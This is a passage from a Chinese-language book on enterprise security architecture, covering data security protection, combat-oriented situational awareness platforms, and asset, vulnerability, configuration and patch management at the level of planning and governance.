对数据进行有效理解和分析以及不同类别和密级的划分;根据数据的类别和密级制定不同的管理和使用原则,尽可能对数据做到有差别和针对性的防护,使得数据在适当的安全保护下自由流转。 ● 场景化防护 根据不同角色在不同场景下的数据使用需求,采用相应的数据安全管控措施。比如对于开发测试人员,在开发场景下,主要满足对生产数据的高度仿真模拟,对于仿真数据的加密、访问控制、审计等安全措施并不重要。在备份和调优场景下,运维人员并不需要具备对真实数据的直接访问能力,只需要行为审计、敏感数据掩码能力。 ● 全局化感知 避免“头痛医头,脚痛医脚”式的局部数据安全防护,全面监控数据流转过程的安全状态,形成全局数据风险视图,统一管理数据安全策略。 9.3 面向大数据应用的数据安全防护建设要点 9.3.1 数据安全治理 开展数据安全治理,包括数据资产梳理、数据分类分级。通过智能学习、内容指纹等方式识别敏感数据,建立数据资产台账,掌握敏感数据的分布、使用情况;通过机器学习、内容指纹、数据字典等方式,对数据进行有效理解和分析,确定数据的类别和级别,对数据进行有差别和针对性的安全管理,实现数据在适当安全防护下的自由流转。 9.3.2 数据安全管理及风险分析 建设数据安全管理与风险分析平台,全面掌握数据流转过程中的安全状态,整体上掌握数据安全风险,统一管理数据安全策略。 9.3.3 数据安全建设要点 ● 终端数据安全防护 基于Windows内核文件驱动层的自动加解密机制,实现文件的透明加解密;对终端数据的传输通道进行全面监控,防止数据通过终端泄露;全面感知终端安全状态,为基于ABAC模型的动态访问控制提供数据支撑。 ● 运维管理场景下的数据安全防护 加强特权访问管理,基于零信任理念,采用ABAC访问控制模型,综合评估运维管理终端的安全状态、运维操作行为,动态调整运维管理权限策略,防止运维人员违规、越权、恶意操作。 ● 业务操作场景下的数据安全防护 加强应用系统、业务功能、API接口、数据层面的访问控制,基于零信任理念,采用ABAC访问控制模型,综合评估业务操作终端的安全状态、业务操作行为,动态调整业务访问权限策略,防止业务人员违规、越权、恶意操作。 ● 数据共享场景下的数据安全防护 建设数据安全隔离与交换系统、网络数据泄露防护系统,防止数据在对外交换过程中发生泄露。 ● 数据开放场景下的数据安全防护 通过“数据不动,应用动”的方式,将第三方数据应用程序部署在数据中心,使其仅返回分析统计结果,保证原始数据不流出数据中心,同时又能对外提供数据服务。 ● 生产转测试场景下的数据安全防护 建设数据脱敏系统,通过静态脱敏技术有效防止开发、测试人员对隐私数据的滥用,防止隐私数据在未经脱敏的情况下从生产环境中流出。 ● 面向数据采集场景的数据安全防护 建设采集设备认证系统,通过证书或设备固有特征识别设备的可信身份,确保数据源可靠。 ● 办公数据安全备份恢复 建设办公数据安全备份恢复平台,接收终端安全系统自动上传或用户手动上传的数据;利用密码基础设施平台提供的加密服务,结合用户身份,对数据进行加密存储;当发生文件损坏时,将备份数据下发到终端或服务器,防止勒索病毒、硬盘损坏等导致的数据不可用。 第10章 面向实战化的全局态势感知体系 10.1 数字化转型与业务发展的新要求 10.1.1 数字化转型对态势感知带来的挑战 随着数字化转型和业务发展的需要,政企机构将面临IT管理和网络安全方面的众多问题与挑战。其中态势感知系统作为安全体系建设中的顶层支撑体系,也将面临更为直接的挑战。而对这些挑战的分析将有助于政企机构安全主管对未来的安全规划与建设构建更为清晰的目标。 这些挑战本质上从安全行业诞生时就已经存在,只是数字化转型所带来的业务流程与IT结构性的变化使这些挑战变得更为剧烈和困难。本章会将政企机构面临的数字化转型的变化与挑战结合,重点分析态势感知系统的挑战。 ● 要实时感知业务运营的网络安全状态 在数字化转型过程中,大量政企机构会将业务从线下服务迁移为线上服务,每个业务的安全状态将直接影响到业务的可用性。业务系统的安全状态包括每个业务系统与信息资产的关联关系、每个信息资产当前的风险状态,以及业务影响分析等。 ● 要持续提升网络安全体系防护水平 数字化转型势必会使政企机构的IT系统呈现多系统并行、系统类型多样的状态,比如私有云、公有云、传统IT系统将在很长的一段时间内在政企机构内部并行存在。由于系统数量和类型的扩展,各种安全措施也会越来越多,这些安全措施很难都能够发挥其应有的作用,以及各种安全措施之间也难以互为补充,因此无法满足业务系统的安全防护要求。 ● 要能够快速处置安全事件,减少信息安全事件对业务的影响 数字化转型使得政企业务和IT系统紧密关联,任何影响IT系统的事件都会影响政企业务。因此政企需要建立以态势感知系统为技术支撑的安防体系,能够将潜在的安全威胁消除在萌芽中。一旦发生安全事件,能通过态势感知能力及时发现、准确定位、快速处置。 10.1.2 传统态势感知建设问题与误区 ● 重管理而轻运营 部分传统态势感知在建设过程中往往聚焦于政企机构的安全管理及支撑流程建设,例如人员管理、流程管理、制度管理,甚至是考核管理。或者从对人的管理下沉为对产品的管理,例如各类安全设备的集中管理。这些管理类功能虽然能在协同工作、信息共享方面发挥作用,但因为其没有从安全的本质需求入手,导致它们往往并不能直接产生安全价值,无法有效地发现安全问题,无法帮助安全管理人员有效地解决问题。 ● 有数据而无分析 传统态势感知一直都在建议采集各类安全数据用于支撑分析和溯源,但在实际的使用过程中,数据是否能够被有效分析是一个不得不额外关注的问题。大量态势感知体系建设的失败案例中,往往都具有一个共同的特征,那就是数据存储消耗了大量资源,但并没有通过安全分析得到安全问题的线索。实际上数据的采集范围和分析能力是相辅相成的,一个好的态势感知体系不仅需要各类安全数据,也需要强大的覆盖关联分析、机器学习、威胁情报等各类技术的威胁分析能力。 ● 重功能而轻效率 传统态势感知往往具有形形色色的功能,这本身无可厚非,但对政企机构来说,需要有效甄别这些功能是否能够有效地支撑安全工作,是否所有功能都能够帮助政企机构有效提升效率,此时功能的多少远远没有“功能适合”更为重要。比如当一个政企机构的IT资产管理能力尚不完善时,即使其态势感知中包含主机资产、Web资产、服务资产等各类资产管理能力,对该政企机构来说可能未必有价值,而只是意味着更高的使用和维护成本。 ● 重建设而轻验证 近年来,态势感知经历了快速发展,不少政企机构已经建设完毕或正在建设当中。伴随着态势感知的建设,很多政企机构内部的安全体系建设也在进行调整。但在这些调整中,我们很少看到对各类系统建设成效的验证和确认,这导致各类系统建设可能无法伴随攻防形式的变化而进行快速调整。这直接导致整个政企机构的安全建设落后于攻击者的攻击手法半年到一年以上,因此我们需要在实战化态势感知体系的建设中给予足够的重视。 10.2 什么是面向实战化的全局态势感知体系 10.2.1 基本概念 面向实战化的全局态势感知体系是网络安全防护体系的“中枢”,能够全天候、全方位感知网络安全态势,增强网络安全防御能力和威慑能力。为了保障业务安全有序运转,应该依托态势感知平台实现数据处理、安全分析、自动化响应、安全运行、指挥控制、态势呈现等多层次的安全能力,形成安全数据的汇聚中心、安全风险的持续监测和处置中心、安全体系有效性的验证中心、安全威胁的分析和发现中心、安全运营指挥中心。 10.2.2 设计思想 在数字化转型的挑战下,实战化态势感知的建设应坚持以下思路: ● 覆盖所有信息资产的全面实时安全监测和分析; ● 持续检验整体纵深安全防御机制的有效性; ● 动态分析安全威胁并及时处置相关安全风险; ● 有效支持安全运行工作; ● 开放共享,协同联动,与网内各类安全子系统集成,形成一体化运营支撑平台。 10.2.3 总体架构 一个相对完善的实战化态势感知平台应该具备以下能力,总体架构设计如图10.1所示。 ● 实战化态势感知平台能够全面接入各种安全相关的数据,并适配政企用户实际情况的安全情报进行自动化的数据分析和处理,以形成各种数据库。 ● 在实际安全运行中,安全分析人员利用标准的数据接口通过图形化的交互式分析提高安全分析效率。 ● 所有的安全运行工作依靠平台的支撑能力实现全闭环式运行。 ● 跨部门、跨业务领域的安全处置工作依照既定的预案进行协同。 ● 政企用户所有的安全态势能够统一视图实时展现。 ● 利用自动化响应能力提高安全事件的处置效率。 ● 利用专门的情报运营提高告警的准确率,做到精准定位、快速处置。 图10.1 实战化态势感知平台能力架构图 10.2.4 关键技术/能力 态势感知的能力建设是一个完整、复杂的体系化建设过程,还需要考虑以下关键能力的应用与建设。 ● 实战化安全运行 一支组织明确、技能合格的运行团队应该利用面向实战化支撑的态势感知平台,通过高效的安全运营流程和规程,既能通过日常的安全运行工作消除隐患,提升政企安全防护水平,又能从容应对安全事件。 ● 采用AOH框架进行信息采集和分析 通过采用AOH框架,将分析工作建立在3个关键的认知结构基础上:动作、观察、假设。3个认知结构相互迭代并形成推理的周期,循环迭代。 ● 自动化模拟攻击 能够对纵深防御的各个环节进行自动化验证的技术与能力。通过自动化方式,极大地提升模拟攻击的效率与准确性。 ● 可视化交互分析 具有对多源头、多维度数据进行综合分析并以可视化方式展现的能力。通过可视化交互分析,分析人员可以进行高效的安全事件分析、研判、溯源、验证等。 ● 多源威胁情报处理 能够接收不同来源的威胁情报并通过处理生成适合政企用户的有针对性的威胁情报。 ● 安全编排与自动化响应 依靠编排的能力通过预定义的安全预案和剧本驱动各类安全设备和分析手法,并利用威胁情报快速响应和处置安全事件。 ● 威胁狩猎 通过可视化、自动化等大数据分析和挖掘技术发现潜在的威胁。 10.2.5 预期成效 ● IT系统自身更健壮 结合实际安全风险状态和威胁情报对系统安全的数据进行资产关联性分析、暴露面分析、失陷概率分析等,强化资产管理,推动漏洞和补丁管理系统配置加固,使得IT系统自身更加健壮(即加强系统自身的安全)。 ● 安全防护更坚固 通过持续模拟攻击测试,验证安全防护系统的有效性,并通过主动优化安全防护策略,提升安全防护系统的有效性。模拟攻击测试可以以人工、自动化或者半自动化的方式进行,而且模拟攻击测试必须是全面而且不断更新的。 ● 威胁发现更及时 实战化态势感知应能够帮助企业有效提升新型威胁、未知威胁和各类内部威胁的检测能力,并缩短威胁事件实际发生时间和威胁被检测时间之间的差距,以尽可能减少企业的损失。威胁情报的适配可以帮助企业更加准确及时地发现安全威胁。 ● 事件分析更高效 当安全问题发生后,运营人员可有效利用实战化态势感知中的各类技术,对安全事件做到更快速和更广泛的响应。例如,直接调取各类系统的数据结合威胁情报进行分析,利用各种狩猎工具完成自动或半自动的信息检索和证据固化,利用时间线、攻击链、ATT&CK等各类方法对事件进行有效还原与溯源。基于以上能力,实战化态势感知可以使安全事件的分析效率更高。 ● 安全问题的响应更快速 依靠实战化态势感知体系中的各类自动化、情报技术的应用,当企业面临重大安全问题时,可以依赖于原有的应急预案或响应剧本针对安全问题进行快速的响应和处置,可针对部分问题实现自动化分析、自动化封禁,从而极大地提高响应速度,避免问题影响进一步扩大。 ● 安全协同更顺畅 实战化态势感知中各类信息发布、研判、协同处置、通报和资源管理功能可以使企业中的安全部门更好地在信息同步、事件处置和应急响应中按照既定的方式与其他IT部门、管理部门、监管部门、合作部门进行沟通和协调。 10.3 面向实战化的全局态势感知体系建设要点 10.3.1 建设要点 在实战化态势感知体系框架的指引下,政企机构在建设态势感知时需要关注以下关键的建设要点。其中实战化态势感知是体系的核心建设目标,必须在企业内部明确。技术要点为实际建设中需要涉及的系统建设要点或关键技术,需要基于企业自身安全发展情况进行选择。管理要点需要根据配套系统的建设情况和不同企业的自身IT管理情况酌情建设。 1.建设目标 建设全天候、全方位的安全态势感知平台,实现数据处理、安全分析、自动化响应、安全运行、指挥控制、态势呈现等多层次的安全能力,支撑实战化安全运行。 2.技术要点 ● 建立安全大数据 通过安全数据收集和处理系统,收集流量日志、流量告警、系统日志、应用日志、安全告警、漏洞信息、威胁情报、资产信息等安全数据,并能够对数据进行自动化的分析处理,形成不同的数据库,并以标准接口的形式提供数据服务。 ● 建设安全分析能力 建设安全分析能力,以统计、聚类、时序、线性、耦合等分析引擎为基础,实现基于资产脆弱性和暴露面的基础架构安全实时监测分析,自动化模拟各种最新的攻击手法,以持续整体验证全网安全架构和安全策略的有效性并持续进行优化,快速分析安全威胁,处置安全事件,主动安全狩猎以发现潜在安全威胁。 ● 建设可视化分析能力 使用可视化交互分析系统,通过一维分析、二维分析、多维分析的各种分析图表以及拓线、钻取等交互式分析方法,安全运行人员能够对安全事件快速分类、定位、处置决策、溯源,安全猎杀人员也能够更有效地发现潜在未知威胁。 ● 利用威胁情报 通过多源威胁情报处理系统,收集多维度、多来源威胁情报,并对情报数据进行清洗、融合、分析、冲突处理、验证,以给出前瞻性预测和决断依据,保障输出情报的准确性和及时性,并适配至数据处理、数据分析、安全运行的各个环节。 ● 建立自动化编排能力 针对可预定义、可重复执行的分析和处置操作,建设安全预案和安全剧本,通过自动化编排引擎使得安全运行人员能更加高效准确地完成安全事件的分析、处理和处置工作。 3.管理要点 ● 明确人员职责并建立安全运行流程 建设安全运行流程化的能力,覆盖风险管理流程、模拟攻击与纵深防御策略优化流程、安全事件处理流程、威胁猎杀流程、情报处理流程等,实现可视化交互分析研判与自动化处置,保证所有安全运行任务的闭环处理。 ● 建立指挥控制与统筹管控机制 利用指挥控制系统,对安全事件的处理进行跨部门协调、资源管理、会商组织、预警通报和预案的管理。 ● 建立安全态势监控与展现能力 开发态势展现大屏,以图形化的方式直观展示综合态势、各种预定义的主题态势、资产态势、攻击态势等。 10.3.2 建设流程 1.建设节奏与建议 在实际建设中,不同的政企机构需要考虑使用适合自身发展的演进路线来建立实战化态势感知体系,避免出现“一刀切”全部上马建设的情况。以下建议可供参考。 ● 各类安全数据的采集是基础,决定了态势感知体系的整体能力,建议优先建设,可基于当前运营能力合理制定数据接入范围。例如,政企机构在安全运营早期仅能解决网络安全问题,此时可以主要考虑采集网络安全设备日志或网络流量数据,当政企机构有精力和有能力推动基于主机的威胁检测和响应时,可以再考虑接入服务器日志或终端行为日志。 ● 安全分析建设需要基于运营团队人员的能力进行逐步优化,同时可以利用安全厂商的各类规则能力或情报能力逐步提升。早期可依赖于单一厂家的规则或威胁情报,然后逐步提升自身的规则运营能力,后期可实现多情报接入以实现情报融合和自主可控的规则配置。 ● 当政企机构不存在具备狩猎能力的人员时,需要对交互式分析、威胁狩猎等建设要点慎重考虑。当团队内至少有一人具有精力和能力进行复杂的事件分析时,建议再进行考虑。 ● 当政企机构不存在较大规模的安全团队,也没有复杂的IT管理架构时,指挥和流程建设要适度。 ● 在体系建设中,运营团队的能力建设尤为关键,可以考虑早期以安全公司的运营服务作为支撑,同时逐步建立良好的团队文化,培养政企机构自身的运营能力,后期逐步与安全公司形成互补和配合工作的方式。 2.建设中的依赖与制约 整个实战化态势感知体系是一个大型工程,其中会涉及政企机构管理架构、外部系统依赖等问题。如果这些问题处理得当,会使整体态势体系推进更为顺利。因此政企机构在态势感知体系建设初期,需要有效识别此类问题并推动解决。 ● 与IT管理的合作 IT管理、业务开发和安全管理部门在很多政企机构都是“相爱相杀”的状态。在配合好的情况下,大家可以一同推动业务发展,快速解决安全问题;在割裂的情况下,大家会相互掣肘,难以推动问题的解决。所以在态势体系建设初期,需要对政企机构IT管理的现状有相对清晰的认识和了解,针对IT治理的成熟度制定态势体系的演进路线,并寻找与IT部门或业务部门的共同目标,甚至是寻找上层决策依据来推动响应处置和管理方面的系统建设。态势感知体系中受此问题影响较大的部分包括以下方面: ▷ 资产与脆弱性的管理和分析; ▷ 安全事件的处理流程; ▷ 防御有效性在验证时的协同; ▷ 自动化编排与响应时的流程对接; ▷ 指挥控制中的大部分能力。 ● 外部系统的对接与管理 实战化态势感知需要依赖大量的对接来实现自动化运营,而这些对接在带来便利的同时,也会带来管理上的困难和风险。在态势体系建设的早期,政企机构需要结合自身的供应商管理能力合理设计对接部分,尽量平衡对接的工作难度和工作效率,优化两者的关系。 另外,对于大型企业或行业主管单位,可以考虑推动行业内部形成统一的对接接口来降低不同厂家、不同系统之间的对接难度。目前,国际上与此类对接相关的标准有OpenC2、STIX等,在此不再一一描述,有兴趣的读者可自行查阅。 ● 合理的安全建设度量 整套态势体系相当庞大,需要长期持续的资金投入才会提升安全效果,这有别于传统的合规采购——采购之后可以短期内快速应对检查。此时政企机构的安全管理人员需要在体系建设早期明确如何度量体系效果,需要围绕安全建设目标来设计度量方案,围绕度量方案建立团队的绩效管理机制和团队文化,如此才能保证体系建设成果可汇报,投入可持续。 常见的度量包括但不限于以下内容: ● 失陷资产的发现数量; ● 无主资产的发现数量; ● 事件的分析数量; ● 事件分析的周期; ● 处置的任务数量; ● 漏洞的缓解周期; ● 漏洞的修复周期; ● 安全规则的数量; ● 攻防对抗中的攻击发现比例。 3.建立实战化态势感知体系是一个长期过程 由于不同政企机构有其自身的安全运营成熟度,与其配套的态势感知建设也需要符合其自身安全建设发展的需要,所以不应该在建设初期追求一步到位,而应该将整个态势感知体系的建设作为长期工作,优先确定符合企业自身需求的成熟度,将一个宏大目标切分为多个阶段性目标来实现。 同时,体系建设过程中需要对人员团队的能力进行建设,需要建立大量配套流程,这些工作往往受限于培养的周期和各个政企机构内部的管理情况,因此只能逐步开展,无法一步到位。这也决定了态势体系建设是一个长期过程。 而且,安全运营的整体发展是动态的,在对抗中不断演进。实战化态势感知在未来的发展中也会基于新形势的变化或新技术的涌现而不断调整,需要持续跟踪,逐步完善整个体系。 第11章 面向资产/漏洞/配置/补丁的系统安全 11.1 数字化转型与业务发展的新要求 11.1.1 数字化发展带来的挑战 数字技术将政企机构的业务运营和管理流程融合到一起,形成了新的业务运营模式,显著提升了业务运营效率和效益。同时,数字化作为信息化升级的高阶模式,其安全能力也变得愈发重要。因此,旨在保护数字化资产的系统安全能力决定了业务的健康和稳定水平。二者可谓休戚与共,息息相关。 2016年4月19日,国家领导人在网络安全和信息化工作座谈会上明确指出:“维护网络安全,首先要知道风险在哪里,是什么样的风险,什么时候发生风险,正所谓‘聪者听于无声,明者见于未形’。感知网络安全态势是最基本最基础的工作。要全面加强网络安全检查,摸清家底,认清风险,找出漏洞,通报结果,督促整改。” Gartner发布的“十大安全发展趋势预测”中曾提到:“到2020年,会有99%的漏洞利用是安全人员和IT人员已经获知至少1年的漏洞。”很多入侵事件都是由于系统配置错误、补丁未修复、已知漏洞等引起的,这是数据泄露和入侵最为普遍的原因。 随着国家对网络安全的重视程度逐渐增加以及各种检查的常态化,从诸多实践中我们不难发现,尽管系统安全是一项业内各政企机构已经进行了十多年的常态性基本运维工作,但实际上该工作却从未真正做扎实。“安全基础”未打牢,则“安全上层建筑”危若空中楼阁,难抵风雨。这也是如今很多威胁分析平台仅作为基础能力展示用途的原因。在历次安全演习中,许多大型政企机构的系统被直接攻陷,由此导致失分,大部分原因在于一直存在的已知漏洞被黑客利用。 与此同时,如今数字业务都运行在数据中心服务器、云或容器环境中,IT和安全运营团队都承受着巨大的压力,政企机构往往要求花更少的钱做更多的事,同时又要确保安全地运行。如果各团队之间没有高效的协作,就不可能取得成功。但据自动化技术公司SaltStack发布的《2020年第二季度XOps状态报告》显示,仅54%的安全主管表示,他们与IT专业人员能够进行有效的沟通,45%的IT专业人员对此表示同意。IT和安全运营团队协作不充分及缺乏沟通,也是漏洞和补丁等基础安全长期无法得到有效落实的根本原因。 11.1.2 传统系统安全面临的问题 企业安全能力的建设是一个叠加演进的过程。当基础架构安全未进行合理建设时,主动防御、威胁情报、态势感知等积极安全则成为空中楼阁,难以真正发挥效用。因此,以基础安全建设为核心的系统安全工程,是打牢安全根基的关键。 当前大多数政企机构普遍存在资产不清、漏洞分布不明、系统未按合规要求进行加固、漏洞修复不及时、基础安全运行流程不闭环、缺乏一体化平台工具支撑等问题,无法有效应对和满足日益复杂的网络环境以及国家护网常态化等实战性需求。传统系统当前存在以下主要问题。 ● 基础安全建设极易被忽视。近几年,安全业界普遍关注积极防御,如态势感知、威胁情报等,却忽视了架构安全、基础安全的能力。大多数机构都引入了外界情报数据,也添置了绚丽的展示屏,然而,没有基础安全能力,这些高精尖技术并不能发挥出应有的效果,相关问题已在多次安全演练中暴露。 ● 当前业内的系统安全建设方案普遍采取单一产品的功能类方案,即通过产品功能实现资产发现、漏洞预警等能力。然而,对于政企机构的“系统工程类”需求,通过单产品则无法真正解决问题,仍然存在大量资产不清、漏洞不明且未设置合理闭环机制等问题。 ● 业内的系统安全解决方案,普遍未与“运营服务”形成合力。系统安全是一个体系化建设工程,虽然通过自动化手段能够发现资产,但核实资产、补足属性、设计合理的闭环流程等工作则需要通过“服务”完成,当前却普遍与“服务”脱节。 11.2 什么是面向资产/漏洞/配置/补丁的系统安全 11.2.1 基本概念 面向资产/漏洞/配置/补丁的系统安全是一套体系化综合运营服务方案,它以内生安全为核心理念,集合多种产品能力,通过专职系统安全人员的运营而形成以资产和风险为核心的企业资产安全管理系统,以“工具平台+人员运营服务”的模式进行交付,旨在解决企业和机构安全防护中的基础设施安全管理挑战,把基础安全工作从定期检查模式转变为可持续验证模式,切实提高客户从资产完整性到漏洞修复的闭环的安全运营服务。 系统安全服务方案涵盖了资产梳理、漏洞管理、配置核查以及补丁运营等多种服务,基于数据驱动技术建立系统安全的大数据分析平台,并以该平台为数据分析能力的支撑点,通过“工具平台+人员运营服务”的模式,补齐资产属性,通过CNNVD、CVE等多源情报数据碰撞,分析得出资产漏洞优先处置顺序,并结合工单系统流程实现闭环管理,有效地提升客户基础安全运营能力。 11.2.2 设计思想 网络安全始于资产发现,企业应当清点所有软硬件资产,并进一步将工作重点转移到最重要的基于资产管理的安全配置管理环节。安全配置管理(Secure Configuration Management,SCM)是指管理和控制信息系统的配置,以实现安全性并促进信息安全风险的管理,一般包括4个步骤。 步骤1.资产发现。 步骤2.为每种受管设备类型定义安全基线。 步骤3.根据预先定义的频率策略,评估管理的设备。 步骤4.确保问题得到修复或准许它作为异常存在。 系统安全遵循SCM的理念,并强调全面打通以资产、配置、漏洞、补丁为核心的4大流程,如图11.1所示。 图11.1 SCM生命周期图 通过安全内容管理、策略符合性分析、资产配置态势感知、风险控制等运行能力,可对所有资产(包括固定资产、虚拟化资产、移动设备等)进行资产发现、持续监控、风险削减,以确保系统安全。 11.2.3 总体架构 系统安全是信息化、数字化安全建设的基础和关键,企业应建设和发展以数据驱动的系统安全运行体系,夯实业务系统安全基础,保障IT及业务有序运行。系统安全的核心目标是建设数据驱动的系统安全运行体系,如图11.2所示。 系统安全运行体系平台通过数据接口和控制接口进行同步,获取经过融合的资产信息、安全配置信息、漏扫及主机加固等多维度的漏洞信息、广义补丁等信息。 经过汇集的资产/配置/漏洞/补丁等数据信息将在系统安全运行体系平台进行处理,并实现数据的两两关联分析,如“资产+配置”“资产+补丁”“资产+漏洞”及“资产+补丁+配置”等,以最大化获取并展示资产的系统及管理属性、资产配置信息、资产当前的漏洞及补丁状态等,从而指引系统安全的运行过程,对符合性评估、安全策略管理及修复管理等进行系统安全风险管理。 同时与态势感知平台、内部威胁感知平台、终端管理及情报运营平台等进行有效联动,从而实现四大流程闭环的价值最大化,最终将系统安全防护从依靠自发自觉的模式提升到体系化支撑模式,实现及时、准确、可持续的系统安全防护。 图11.2 数据驱动的系统安全运行体系 11.2.4 关键技术 要实现系统安全运行的有效闭环,需要多维度多层次的技术能力来配合实现。 ● 资产管理关键技术 应以资产梳理为起点,逐渐完成资产画像工作,更加清晰地掌握系统总体轮廓。资产采集技术分为主动感知与被动收集。主动感知可对所有在线设备进行网络扫描和深入识别,获取终端的网络地址、系统指纹、资产指纹、开放端口和服务等,并根据积累和运营的指纹库确定每个终端的类型、操作系统、厂商信息。被动收集通过采集资产间的流量数据,发现隐匿资产、孤岛资产以及易被黑客攻击的资产。 ● 漏洞管理关键技术 应根据不同的生命周期状态对漏洞的风险值进行修正,以最大程度地接近和还原用户真实IT环境中的风险。采取结构化、标准化和组织化的方式来处理漏洞数据,能够有效降低来自多源数据40%以上的数据量,同时根据漏洞具有的特征整合威胁情报并评估情报信息,解决宏观分析的问题。 ● 配置核查关键技术 建立丰富的配置核查知识库、命令行库,使其覆盖市面上大部分设备,且支持自定义的核查项编写,能根据特殊设备情况编写适用的命令行,获取设备配置信息。 ● 补丁运营关键技术 在系统安全工程中,“补丁”概念属于广义范畴。广义补丁的目标是通过合理化手段降低企业系统风险,提升系统的整体安全,并非千篇一律地使用“打补丁”方式,而是根据情况不同,酌情选择使用虚拟补丁、访问控制列表、身份验证、资产下线等多种手段。 ● 数据整合关键技术 应做好系统安全基础数据的采集、发现、分析,从系统安全管理视角出发,最终将资产数据、资产与漏洞情报数据的关联情况,以及资产存在的不安全配置项这类基础数据,通过集中管控可视化平台进行统一管理、展示,并根据已有的管理制度进行线上处置流程的协同配合与跟踪反馈。 11.2.5 预期成效 在系统安全领域中,随着大数据、人工智能等先进技术在安全领域的不断应用,资产管理、漏洞管理、配置管理、补丁管理的自动化和智能化在不断提高,传统的、被动的、粗粒度的系统安全技术体系将被逐渐替代,系统安全将为政企机构实现以下目标。 ● 建成数据驱动的系统安全运行体系 通过聚合IT资产、漏洞、补丁、配置等数据,将系统安全防护从依靠单产品或人工模式提升到依靠“工具平台+人员运营服务”体系化支撑的模式,实现及时、准确、可持续的系统安全防护。 ● 规范化漏洞验证 通过漏洞数据与资产数据的实时碰撞、比对、分析,完成安全风险等级排序,明确漏洞修复优先级,改变以往系统安全体系中完全依靠人工进行逐条漏洞验证的工作方法,减少安全部门、运维部门的工作量,从而提升系统安全的日常工作效率。 ● 持续达到合规要求 通过建设系统安全运行体系,分别从系统安全技术与系统安全管理这两方面完善基础支撑工作,落实《信息安全技术 网络安全等级保护基本要求》中对资产管理的相关要求,为接下来每一步的网络安全建设夯实基础。 ● 四大流程实现闭环 改变政企机构长期以来资产查不清、漏洞找不准、补丁修复不及时、系统长期未按要求加固而导致的四大流程不闭环现状,通过一体化平台工具的支撑,确保系统安全风险总体可控,保持良好的安全状况,为实战化安全运营提供支撑,实现系统级安全运行的闭环。 11.3 面向资产/漏洞/配置/补丁的系统安全建设要点 11.3.1 建设流程 面向资产/漏洞/配置/补丁四大流程的系统安全是企业信息化建设的基础和关键,企业应着眼于建设能经受实战考验的安全能力,从多维度全景视角出发,改变以往从具体的攻防技术、日志分析或事件处置等事件出发的就事论事、就安全论安全的传统思维习惯,转变成从企业视角、数字化视角、信息安全的全景视角出发进行实战化安全能力的建设,并在建设过程中根据每个企业自身的特点,结合所在行业的属性,充分地与企业的信息化环境进行融合覆盖,使信息化环境自身从规划建设阶段就已具备免疫力和安全属性,并能够随数字化一起发展并结合落地。 具体落实到系统安全建设本身,基础架构安全运行应围绕以资产为主线的资产运维、漏洞管理、配置基线管理以及补丁管理等常态化安全运行活动,接受来自积极防御运行活动中的安全加固指令,并依据威胁情报运行活动中的加固方法对企业的关键资产进行加固,从企业的领导层发起并着手梳理IT运营部门、安全运营部门以及业务应用部门等各团队之间的业务流程,理清并定义好各部门的责权分工,充分利用企业现有的资产管理系统,并发挥业务流程系统的优势,对信息和业务流程进行融合和优化,最终以实现四大流程的闭环为目标进行系统安全的能力建设。 11.3.2 建设要点 要落实系统安全在企业中的建设,应首先应根据企业自身实际情况灵活定制,量体裁衣,同时也需注意遵循一定的关键步骤,各分项执行重点如图11.3所示。 图11.3 系统安全方案架构设计图 1.测试验证环境搭建(参见图11.3左下方“测试环境”部分) 在企业内部搭建与生产环境高度相仿的测试环境,对各种设备、系统镜像模板和业务环境中的预置安全配置项、漏洞验证措施、修复或加固措施进行测试验证,开展补丁测试、镜像测试、配置项测试、业务应用回归测试,提高漏洞修复与配置变更工作的有效性、稳定性和确定性。 2.构建资产安全管理系统 ● 多源丰富的数据源(参见图11.3中部下方 “资产探查”部分) 建设面向企业IT服务的资产管理系统,通过基于网络的主动扫描、基于流量的被动扫描、主机代理、CMDB(Configuration Management Database,配置管理数据库)等多源导入方式,获取终端、主机、中间件、数据库等资产属性信息,继而对资产信息进行统一的标准化处理,最终形成企业资产管理数据库,实现完整资产的全量覆盖,并实现未备案资产违规上线的快速发现。在此过程中,应充分利用各种数据导入方式的特点并发挥其各自的优势,以实现最大程度的自动化和属性粒度的细化,为后续人工补足资产属性降低难度和减少工作量。 ▷ 主动扫描:基于网络通过IP进行扫描,并进行指纹比对以确认资产类型。主动扫描的粒度介于被动扫描与主机代理之间,但无法保证基于IP的扫描不被企业各种网络设备干扰拦截。 ▷ 被动扫描:基于流量收集获取企业网络中所有的五元组信息(源IP地址,源端口,目的IP地址,目的端口,传输层协议)。被动扫描的粒度最粗,但能够确保资产无遗漏。 ▷ 主机代理:基于在资产端部署主机代理并通过插件工具进行主机信息和属性的收集。生机代理的粒度最细,但无法保证所有资产的安装覆盖。 ● 与企业现有系统集成(参见图11.3右方中部 “信息补全”部分) 系统安全平台应与政企机构现有的CMDB、HR(Human Resource,人力资源)、PMS(Project Management System,项目管理系统)等系统集成,以获取资产的所属业务、责任人、归属部门、重要程度等资产管理属性信息,并结合后期的人工运营梳理工作,切实补全遗漏的系统属性和管理属性。通过资产的属性信息补全夯实,为系统安全后续的漏洞信息适配、系统安全风险分析、整改责任落实提供坚实的基础。 3.构建系统安全配置管理体系(参见图11.3中部“资产与安全配置管理”部分) ● 验证配置有效性 在测试环境中验证配置方案的有效性继而进一步发布和推广,明确系统安全配置项。基于最小化特权的安全原则,实现系统的最小化安装,避免不必要程序的安装而引入的额外风险,且有效确保已部署的系统得到正确配置。 ● 建设配置策略管理系统 按需编写和调整配置核查策略,基于策略对资产安全配置性进行检查,得出安全配置符合性检查结果。采集资产生命周期配置信息,持续跟踪和监控资产配置变化,为配置脆弱性的修复提供全面、准确的数据基础。 ● 灵活的定制能力 与配置管理体系相匹配的系统还应具备根据各政企机构自身的安全需求进行灵活定制的能力,建立可以满足信息安全管理体系的安全配置要求的基线。如系统应具备灵活创建核查任务的能力,在创建核查任务时可按需选择立即检查、定时执行、周期检查和离线检查等检查方式。核查策略可以选择不同的检查规范模板,被检查设备可选择新增设备、设备库导入和文件导入方式。 ● 丰富的配置核查项 内置丰富的配置核查知识库、多种命令行库,使其覆盖市面上大部分设备,且系统支持自定义的核查项编写,能根据特殊设备情况编写适用的命令行,获取设备配置信息。 ● 核查项目自定义 提供可视化的编辑界面,可对核查项的标准值进行自定义修改,便于根据企业自身情况进行调整,增加核查的灵活度。 ● 基于规范模板的配置核查 系统内置丰富的配置安全规范,运维人员根据需要选用固定的规范模板,即可直接执行配置核查任务。 4.构建漏洞管理体系(参见图11.3中部 “漏洞管理”部分) 在测试环境中验证漏洞的存在情况以及漏洞修复方案的可行性,并得出漏洞修复的可行性结论。 